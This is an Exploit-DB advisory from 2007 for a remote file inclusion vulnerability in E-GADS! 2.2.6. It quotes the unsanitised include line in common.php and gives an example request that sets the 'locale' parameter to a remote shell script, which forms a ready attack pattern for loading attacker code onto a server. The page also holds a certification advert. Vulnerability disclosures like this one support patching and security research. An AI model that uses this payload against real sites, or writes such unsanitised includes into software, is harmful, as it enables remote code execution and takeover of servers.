E-GADS! 2.2.6 - 'common.php?locale' Remote File Inclusion

EDB-ID:

3846




Platform:

PHP

Date:

2007-05-04


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

##############################################################################################
##############################################################################################
#E-GADS! 2.2.6 Remote File Inclusion Vulnerability
#
#Dork::(
#
#Vuln Code
###################################################################################
#
#ERROR:common.php
#
# require ("$locale/locale.php");
#
#BUG:
#
#Example:http://site.com/path/common.php?locale=[[Sh3LL Script]]
#
#Script Download
#############################################################################
#https://sourceforge.net/project/showfiles.php?group_id=88942&package_id=93125&release_id=444821
#
#Special Thanks:##### x0r0n ##### ajan ##### siircicocuk
#####################################
##############################################################################################
##############################################################################################

# milw0rm.com [2007-05-04]